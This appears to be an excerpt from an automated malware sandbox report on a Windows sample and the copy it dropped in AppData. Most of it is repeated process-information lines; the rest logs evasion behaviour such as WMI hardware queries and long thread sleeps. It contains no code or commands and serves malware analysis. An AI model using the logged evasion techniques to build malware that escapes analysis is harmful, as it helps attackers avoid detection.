                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_16.exe PID: 6668, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: NxmtwwVGOtEdjd.exe PID: 7680, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeMemory allocated: 1300000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeMemory allocated: 2E90000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeMemory allocated: 4E90000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeMemory allocated: 7C00000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeMemory allocated: 8C00000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeMemory allocated: 8EB0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeMemory allocated: 9EB0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeMemory allocated: 1340000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeMemory allocated: 2E70000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeMemory allocated: 14A0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeMemory allocated: 2FB0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeMemory allocated: 31E0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeMemory allocated: 3020000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeMemory allocated: 79D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeMemory allocated: 89D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeMemory allocated: 79D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeMemory allocated: F60000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeMemory allocated: 2CE0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeMemory allocated: 2A70000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8436
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8182
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 505
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeWindow / User API: threadDelayed 2784
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeWindow / User API: threadDelayed 1041
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeWindow / User API: threadDelayed 1143
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeWindow / User API: threadDelayed 2365
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 2060Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7540Thread sleep time: -11068046444225724s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7576Thread sleep time: -7378697629483816s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7428Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7628Thread sleep count: 2784 > 30
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -11990383647911201s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -100000s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -99891s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -99776s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -99671s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -99548s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -99437s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7628Thread sleep count: 1041 > 30
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -99296s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -99172s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -99059s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -98938s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -98813s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -98704s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -98594s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -98454s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -98329s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -98219s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -98107s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -97999s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -97774s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -97469s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -97279s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 7740Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8044Thread sleep count: 1143 > 30
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8044Thread sleep count: 2365 > 30
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -8301034833169293s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -100000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -99890s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -99781s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -99671s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -99562s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -99453s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -99342s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -99226s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -99119s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -98843s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -98634s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -98499s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -98336s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -98233s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -98109s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -97999s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 100000
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 99891
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 99776
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 99671
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 99548
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 99437
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 99296
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 99172
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 99059
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 98938
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 98813
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 98704
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 98594
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 98454
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 98329
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 98219
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 98107
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 97999
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 97774
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 97469
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 97279
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 922337203685477
